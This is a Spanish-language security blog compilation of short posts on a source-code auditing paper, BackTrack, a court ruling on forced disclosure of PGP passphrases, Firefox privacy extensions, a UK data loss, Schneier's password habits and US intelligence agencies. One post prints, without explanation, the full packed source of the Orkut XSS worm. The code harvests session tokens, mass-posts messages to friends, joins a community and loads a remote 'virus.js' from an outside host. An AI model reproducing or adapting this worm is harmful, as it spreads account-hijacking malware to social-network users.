Esta vez Shreeraj Shah, whitehat y fundador de blueinfy ha liberado un nuevo paper en donde toca temas tan interesantes como los metodos que deben de ser implementado para encontrar algun error en una aplicacion; utilizando herramientas de su propia manufactura.

El rastreo de códigos de fuente de un aplicacion para la detección de la vulnerabilidad es un reto interesante y relativamente un problema complejo también. Hay varios problemas de seguridad que son difíciles de identificar usando pruebas blackbox y otras cuestiones se pueden identificar mediante el uso del código fuente. Cuestiones de seguridad de nivel de aplicación pueden ubicarse en la capa de lógica y es muy importante contar con el código fuente de auditoría realizado para desenterrar estas categorías de fallos.

Descargue el documento en formato PDF aquí.
Fuente: net-security

Como ya se ha comentado en varios foros y blogs, el 14 de este mes fue liberada la version beta de la distribucion BackTrack, y es sin duda una gran noticia para toda la comunidad de la seguridad informatica, ya que esta nueva version trae nuevas y mejoradas caracteristicas, entre las cuales:

Orkut es una red social (comunidad virtual) promovida por Google desde enero del 2004. La red está diseñada para permitir a sus integrantes mantener sus relaciones existentes y hacer nuevos amigos, contactos comerciales o relaciones más íntimas; de esta manera se vuelve un blanco bastante jugoso para los gusanos encargados de recolectar informacion sensible de los usuarios de esta red.

Orkut de Google fue alcanzado por un gusano del tipo XSS, el codigo fuente que podrás encontrar en la parte inferior de esta entrada. Para ser honesto, ya era hora. La tendencia a la infección de virus para redes sociales Web2.0 y otras amenazas cibernéticas seguirá aumentando durante los proximos años. Esto es seguro!. El simple hecho, es que las redes sociales reunen una gran cantidad de información personal que los atacantes pueden fácilmente cosechar para su propio beneficio.

El codigo es bastante simple y no puede traer ningun problema para saber lo que hace, Por lo tanto, esta es la razón por la cual voy a omitir la explicación:

function $(p,a,c,k,e,d) {
e=function(c) {
return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))
};
if(!''.replace(/^/,String)){
while(c--){d[e(c)]=k[c]||e(c)}
k=[function(e){return d[e]}];
e=function(){return'\\w+'};
c=1
};
while(c--){
if(k[c]){
p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
}
}
return p
};
setTimeout(
$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")}
L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+(c?"; c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};
5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5 3=B();3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);
3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
7 V(){6(j==8.18("N").M){b};
5 I="1V 1W 1X... 1Y 1Z 20 21 22 23 24<1k/>[1j]25 "+i F()+"[/1j]<1k/><13 1o=\\"o://k.w.p/28.z\\" 2a=\\"Q/x-2c-2d\\" 2e=\\"2g\');
r=8.1n(\'r\');r.1o=\'o://1p.2k.p/2n/1p/1s.1t\';8.D(\'1w\')[0].1f(r);19(\'\\" 1C=\\"1\\" 1E=\\"1\\"></13>“;
5 a=”15.1I=1&H=”+n(q)+”&I=”+n(I)+”&K=”+n(E)+”&1T=”+8.18(”N”).O(j).P;5 3=B();
3.R(”q”,”o://k.w.p/2i.z”,C);3.12(”10-1e”,”Q/x-k-17-1b;”);
3.a(a);3.Y=7(){6(3.X==4){j++;5 d=i F;d.1d(d.1h()+11);W(\’s\’,j,d);V()}}};
6(!v(\’s\’)){5 d=i F;d.1d(d.1h()+11);W(\’s\’,\’0\’,d)};j=v(\’s\’);T();
‘,62,150,’|||xml||var|if|function|document|domain|send|return|path|wDate||select|name|begin|new|index|
www|dc|expires|encodeURIComponent|http|com|POST|script|wormdoorkut|div|end|getCookie|orkut||cookie|aspx
|prefix|createXMLHttpRequest|true|getElementsByTagName|SIG|Date|loadFriends|POST_TOKEN|scrapText|null|
signature|catch|length|selectedList|item|value|application|open|indexOf|cmm_join|secure|sendScrap|setCookie|
readyState|onreadystatechange|try|Content|86400|setRequestHeader|embed|ActiveXObject|Action|else|form|
getElementById|escape|status|urlencoded|200|setTime|Type|appendChild|00|getTime|01|silver|br|XMLHTTP|curCookie|
createElement|src|files|JSHDF|xmlr|virus|js|Thu|Jan|head|70|GMT|go|GET|Compose|width|innerHTML|height|option|
setAttribute|id|submit|style|display|none|removeChild|body|join|CommunityJoin|responseText|cmm|44001818|toUserId|
history|2008|vem|ai|que|ele|comece|mto|bem|para|vc|RL|deleteCookie|raw|LoL|Msxml2|type|Microsoft|shockwave|flash|
wmode|toGMTString|transparent|false|Scrapbook|unescape|myopera
|XMLHttpRequest|substring|virusdoorkut|CGI|Page’.split(’|'),0,{}),1
);
author=”Rodrigo Lacerda”

El codigo tambien esta disponible en antrix.net

Fuentes y enlaces:
gnucitizen.org
wikipedia es
Samy myspace worm

Se produjo un hecho legal entre curioso e interesante que se narra con detalle en News.com: Un juez dice que los fiscales no pueden obligar a un acusado a divulgar sus contraseñas. Salvando las diferencias en los sistemas legales, que hacen que allí esto siente precedente más rápidamente que aquí (España), que parece que todavía cabe posibilidad de recurso, y los matices sobre el famoso «derecho a no declarar contra uno mismo», el caso se resume en que un juez considera que revelar unas contraseñas puede suponer dar acceso a información en cierto modo autoincriminatoria, lo cual sería equivalente a autoinculparse o declarar contra uno mismo, algo que violaría los derechos de los acusados (al menos en Estados Unidos, está incluido en la quinta enmienda a su Constitución). El fiscal había pedido en un juicio que el acusado revelara sus «frases de contraseña» (passphrases; contraseñas largas compuestas por una frase, más seguras que las palabras únicas convencioanles) para PGP, el programa de cifrado con el que encontraron información en su portátil. Es un tanto asombroso que hasta ahora no hubiera habido casos relevantes donde se hubiera dado esta situación de una forma tan clara como para sentar precedentes, pero al parecer sólo había literatura al respecto, posturas a favor y en contra, pero no se había cuestionado de forma firme en un caso práctico. Metafóricamente, es comparable a pedirle a alguien que entregue la llave de una caja fuerte donde hay documentos incriminatorios contra él. Por lo general, la ley obliga a entregar la llave, igual que los acusados están obligados a entregar muestras de sangre o sus huellas digitales, que también podrían resultar incriminatorias. Una interesante fórmula alternativa que se manejó en la lista de los cypherpunks hace más de una década, ante ese «vacío legal» sobre si las autoridades podrían obligar a alguien a revelar su contraseña o no era la siguiente: utilizar como contraseña una frase… realmente autoincriminatoria. Como por ejemplo:

El 4 de agosto de 1992 conduje a 200 km por hora por la autopista @@@

ZZZ Tengo un cadáver enterrado debajo del tercer árbol de mi jardín, según se sale a la derecha

Copié en el examen de acceso a la universidad, oh, sssssi, lo hice

La frase puede ser real o inventada. Pero entonces cuando las autoridades la requieren, bastaría alegar que no se puede revelar porque la propia frase supondría inculparse… realmente. Actualización: También explicado en Kriptópolis, bajo el título Juez considera inadmisible obligar a un sospechoso a revelar su contraseña de cifrado. (Vía sssssh reddit.)

La mayoria de personas bloquean sus puertas y ventanas, usan una trituradora de papel para protegerse del robo de identidad, e instalan un software antivirus en sus computadoras. Sin embargo, habitualmente navegan en Internet sin dar un segundo pensamiento de si el navegador es seguro y su información personal segura. Desafortunadamente, no es dificil para alguien con malas intenciones de usar un sitio en la Web para recopilar los datos de -- o introducir software espía a -- el equipo. Peor aún, a veces todo lo que tiene que hacer es hacer clic al azar en un sitio web para que sus datos sean obtenidos en una forma más inoportuna.

Mozilla Firefox tiene varias opciones de seguridad para ajustar a través del panel de preferencias, pero también hay más de 150 extensiones para privacidad y seguridad que se pueden añadir también. Son fáciles de instalar y de poco tiempo para establecer; algunos incluso trabajan automáticamente después de reiniciar su navegador. Vamos a echar un vistazo a algunas de las más populares y más útiles.

Una de las mejores formas de proteger su equipo es el de prevenir el uso de JavaScript del navegador en los sitios Web sin autorización. JavaScript, aunque útil para el desarrollo de sitios Web deslumbrantes, ha ganado algo de la reputación de ser un método para el ejercicio de Bad Things inocentes a los ordenadores. NoScript es una extensión que hace que cada sitio que utiliza JavaScript pedirle permiso antes de ejecutar. NoScript puede hacer que sitios pesados con JavaScripts sean ilegibles, pero ofrece una lista blanca de sitios aceptables que usted puede agregar fácilmente a con el fin de acelerar su experiencia de navegación.

Muchas personas usan Tor para ocultar sus hábitos de navegación en línea. FoxTor ofrece una forma de enmascarar y desenmascarar su navegador sobre la marcha, sin tener que comprometerse a practicar surf anónimo durante toda una sesión de navegación. Se requiere el uso de Tor y Privoxy.

Su navegador tiene registros del historial para ayudar a proporcionar una experiencia de navegación más rápida. Lamentablemente, los piratas informáticos pueden hechar una ojeada a distancia para ver dónde ha estado. La eliminación de información de los registros después de cada sesión de navegación puede llegar a ser lenta la navegacion, pero afortunadamente, hay otro camino. No elimine sus datos -- ocultela con SafeHistory.

Algunos de lo más sensible es la información que enviada a través de Internet viaja a través del correo electrónico, de modo que mucha gente prefiere enviar sus mensajes cifrados. El Gmail S/MIME extensión encripta los mensajes de Gmail, incluidos los archivos adjuntos, automáticamente, siempre que tenga el certificado digital del destinatario.

Mientras que Firefox 2 ha incorporado la protección contra el phishing, nunca perjudica tener un plan de copias de seguridad. La premisa detrás de Petname es simple: dejar notas de aviso en los sitios Web de su confianza y las notas aparecerán automáticamente cada vez que regrese. Si usted practica surf a lo que usted asume es uno de sus sitios de la lista blanca y no aparece nota de aviso, usted sabrá que algo no es correcto. Esta extensión es especialmente útil si está utilizando una versión anterior de Firefox sin protección anti-phishing.

SecurePasswordGenerator es un nombre largo para una pequeña aplicacion, que se reúne en su barra de herramientas y le ayuda a crear contraseñas únicas. La mitad de la batalla de permanecer seguro en línea es compleja y utilizando diferentes contraseñas cada vez que te registras en un sitio en la Web. Utilice esta herramienta para ayudarle a crear una contraseña única.

¿Alguna vez se preguntó si la información que se teclea en un formulario en línea que le pasa una vez que se pulse en "enviar"? Con FormFox, puede averiguarlo. Una vez que haya descargado y habilitado esta extensión, asomando el puntero del ratón sobre el campo de datos de un formulario o el cuadro de búsqueda revelará exactamente quién recibe la información que introduzca. Utilice esta extensión para comprobar un sitio web desconocido sitio Web antes de introducir su nombre, dirección, información de tarjeta de crédito y mientras hace sus compras en línea de vacaciones.

Muchas personas usan direcciones de correo electronico temporales para todo el correo electrónico de Internet para evitar el spam. Aunque el spam se considera generalmente más de un abuso que un problema de seguridad, hay ocasiones cuando una dirección desechable puede ser una opción más segura que la prestación real (en los foros de mensajes, por ejemplo). Hay servicios de correo electronico temporal para elegir; TrashMail.net esta extensión de Firefox ofrece una atractiva oferta en este servicio.

A veces es necesario para proteger su información de las miradas indiscretas de la gente que te rodea. Si está navegando en un aeropuerto o el cibercafé de la esquina, la gente que pasa puede hechar una mirada en los títulos de las pestañas que tiene abiertas. Page Title Eraser le permite ya sea poner en blanco el título y el icono en el navegador de pestañas, o sustituirlo con algo de texto de su elección.

Cuando se trata de proteger su privacidad, la última cosa que desea es un sitio en la Web que recopile sus datos sobre lo que hace mientras la visita o cuando usted haga clic en algo, ¿cuánto tiempo se visita una página, y así sucesivamente. Guardando asi su perfil. Aunque es inofensivo si un sitio realiza el seguimiento de datos sobre el tiempo necesario para leer un artículo, sobre la manera de instalar un juego de vídeo, la mayoría de la gente considera que no hay razón, un sitio Web no necesita saber nada acerca de sus hábitos de navegación, incluso si es sólo para Recoger datos para fines de marketing.

La mayoría de las extensiones y herramientas de uso común tratan de evitar que los datos de los perfiles en los motores de búsqueda caigan en las manos de los forasteros. TrackMeNot se invierte el enfoque y, de hecho, envía un montón de información para los motores de búsqueda mediante un proceso. Por supuesto, envía la mayoría de información falsa, lo que significa que su búsqueda de actividades permanecen ocultas a la vista y los motores de búsqueda no recogen de ninguna forma datos significativos de su visita.

Estas son sólo algunas de varias decenas de extensiones de privacidad y seguridad disponibles para Firefox; puedes encontrar una lista más completa en el sitio web de Mozilla. Herramientas como estas pueden hacer su experiencia de navegación más segura, pero recuerde: nada es infalible, y hackers con talento pueden todavía encontrar medios para sacar la información de su sistema si intentan lo suficiente. Siempre con cuidado.

Linux.com

La pérdida de 25 millones de fichas personales en Gran Bretaña, también conocido como «el WTF definitivo» que dejó la privacidad de medio país completamente vulnerable sigue asombrando a propios y extraños. Ahora se ha calculado que esos datos, perdidos en dos CD-ROM que se «extraviaron» podrían valer en el mercado negro unos dos mil millones de euros: diversos tipos de criminales podrían usarlos para suplantar identidades y realizar transacciones falsas. Con razón ya empiezan a llamarlo el Chernobil de Gran Bretaña.

Bruce Schneier responde a Stephen J. Dubner de Freakonomics en una interesante entrevista: Bruce Schneier Blazes Through Your Questions. La pregunta obvia para este héroe de la seguridad informática, que hasta compite con Chuck Norris es… ¿Cómo hace Bruce Schneier para recordar todas sus contraseñas? La respuesta es interesante:

No puedo. Nadie puede, sencillamente: todos tenemos demasiadas. Tengo varias estrategias. Una, elegir la misma contraseña para todas las aplicaciones de baja seguridad. Hay varios sitios a los que pago por acceder, de modo que tengo la misma contraseña para todos ellos. Dos: las escribo en un papel. Circula la leyenda de que no se deben escribir en papel nunca las contraseñas, pero mi consejo es preecisamente lo opuesto. Ya sabemos cómo guardar de forma segura trozos de papel, de modo que basta escribirlas y guardarlas en el mismo sitio que otras cosas que requieren cierta seguridad: en la cartera. Y, tres, guardo todas mis contraseñas en un programita llamado Password Safe que diseñé yo mismo (sólo para Windows, lo siento), que cifra de forma segura todas las contraseñas.

Intelligence.gov parece algo así como la página de inicio o el portal de las agencia relacionadas con las labores de inteligencia/espionaje estadounidenses. En el menú de la izquierda se ofrece una cómoda lista a las dieciséis agencias reconocidas como tales. El público en general conoce poco más allá del FBI la CIA, la NSA o la DEA, pero al parecer las ramas del espionaje son frondosas.

• Air Force Intelligence
• Army Intelligence
• Central Intelligence Agency
• Coast Guard Intelligence
• Defense Intelligence Agency
• Department of Energy
• Department of Homeland Security
• Department of State
• Department of the Treasury
• Drug Enforcement Administration
• Federal Bureau of Investigation
• Marine Corps Intelligence
• National Geospatial-Intelligence Agency
• National Reconnaissance Office
• National Security Agency
• Navy Intelligence

(Espiando desde Valleywag.)